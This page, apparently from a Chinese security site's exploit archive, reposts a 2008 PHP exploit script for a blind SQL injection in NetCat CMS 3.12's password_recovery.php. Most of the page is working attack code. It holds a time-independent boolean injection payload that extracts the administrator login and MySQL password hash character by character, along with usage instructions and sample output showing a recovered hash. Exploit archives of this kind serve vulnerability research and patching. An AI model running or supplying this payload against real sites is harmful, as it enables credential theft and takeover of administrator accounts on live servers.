首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 CMS NetCat 3.12 (password_recovery.php) Blind SQL Injection Exploit 来源：s4avrd0w@p0c.ru 作者：s4avrd0w 发布时间：2008-12-24   <? /* NetCat Blind SQL Injection exploit by s4avrd0w [s4avrd0w@p0c.ru] Versions affected 3.12 More info: http://www.netcat.ru/ * tested on version 3.12 usage: # ./NetCat_blind_SQL_exploit.php -s=NetCat_server -u=User_ID The options are required: -u The user identifier (number in table) -s Target for exploiting example: # ./NetCat_blind_SQL_exploit.php -s=http://localhost/netcat/ -u=2 [+] Phase 1 brute login. [+] Brute 1 symbol... ...........a [+] Brute 2 symbol... ..............d [+] Brute 3 symbol... .......................m [+] Brute 4 symbol... ...................i [+] Brute 5 symbol... ........................n [+] Brute 6 symbol... ..................................... [+] Phase 1 successfully finished: admin [+] Phase 2 brute password-hash. [+] Brute 1 symbol... * [+] Brute 2 symbol... .0 [+] Brute 3 symbol... .0 [+] Brute N symbol... <...> [+] Brute 42 symbol... ..................................... [+] Phase 2 successfully finished: *00a51f3f48415c7d4e8908980d443c29c69b60c9 [+] Exploiting is finished successfully [+] Login - admin [+] MySQL hash - *00a51f3f48415c7d4e8908980d443c29c69b60c9 [+] Decrypt MySQL hash and login into NetCat CMS. */ function http_connect($query) { global $server; $headers = array(     'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',     'Referer' => $server ); $res_http = new HttpRequest($server."modules/auth/password_recovery.php?=1".$query, HttpRequest::METH_GET); $res_http->addHeaders($headers); try { $response = $res_http->send()->getBody(); if (eregi("page_header", $response)) { return 1; } else { return 0; } } catch (HttpException $exception) { print "[-] Not connected"; exit(0); } } function brute($User_id,$table) { $ret_str = ""; for ($i=1;$i<43;$i++) { print "[+] Brute $i symbol...\n"; for ($j=42;$j<123;$j++) { $q = "'/**/OR/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/$table/**/FROM/**/USER/**/limit/**/$User_id,1),$i,1))))=$j,1,0)/*"; if (http_connect($q)) { $ret_str=$ret_str.chr($j); print chr($j)."\n"; break; } print "."; if ($j == 57) $j = 96; if ($j == 42) $j = 47; } if ($j == 123) break; } return $ret_str; } function help_argc($script_name) { print " usage: # ./".$script_name." -s=NetCat_server -u=User_ID The options are required: -u The user identifier (number in table) -s Target for exploiting example: # ./".$script_name." -s=http://localhost/netcat/ -u=1 [+] Phase 1 brute login. [+] Brute 1 symbol... ..1 [+] Brute 2 symbol... ..................................... [+] Phase 1 successfully finished: 1 [+] Phase 2 brute password-hash. [+] Brute 1 symbol... ..................................... [+] Phase 2 successfully finished: [+] Exploiting is finished successfully [+] Login - 1 [+] MySQL hash - [+] You can login into NetCat CMS with the empty password "; } function successfully($login,$hash) { print " [+] Exploiting is finished successfully [+] Login - $login [+] MySQL hash - $hash "; if ($hash) print "[+] Decrypt MySQL hash and login into NetCat CMS.\n"; else print "[+] You can login into NetCat CMS with the empty password\n"; } if (($argc != 3) || in_array($argv[1], array('--help', '-help', '-h', '-?'))) { help_argc($argv[0]); exit(0); } else { $ARG = array(); foreach ($argv as $arg) { if (strpos($arg, '-') === 0) { $key = substr($arg,1,1); if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); } } if ($ARG[s] && $ARG[u]) { $server = $ARG[s]; $User_id = intval($ARG[u]); $User_id--; print "[+] Phase 1 brute login.\n"; $login = brute($User_id,"Login"); print "\n[+] Phase 1 successfully finished: $login\n"; print "[+] Phase 2 brute password-hash.\n"; $hash = brute($User_id,"Password"); print "\n[+] Phase 2 successfully finished: $hash\n"; successfully($login,$hash); } else { help_argc($argv[0]); exit(0); } } ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·RoundCube Webmail <= 0.2b Remo ·Getleft 1.2 Remote Buffer Over ·CMS NetCat 3.12 (password_reco ·Google Chrome Browser (ChromeH ·PGP Desktop 9.0.6 (PGPwded.sys ·FreeSSHD 1.2.1 (Post Auth) Rem ·Psi Jabber Client (8010/tcp) R ·Exploits FreeSSHd Multiple Rem ·Mozilla Firefox 3.0.5 location ·CUPS < 1.3.8-4 (pstopdf filter ·Oracle Pwnage Part 6 from DBA ·BulletProof FTP Client 2.63 Lo   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved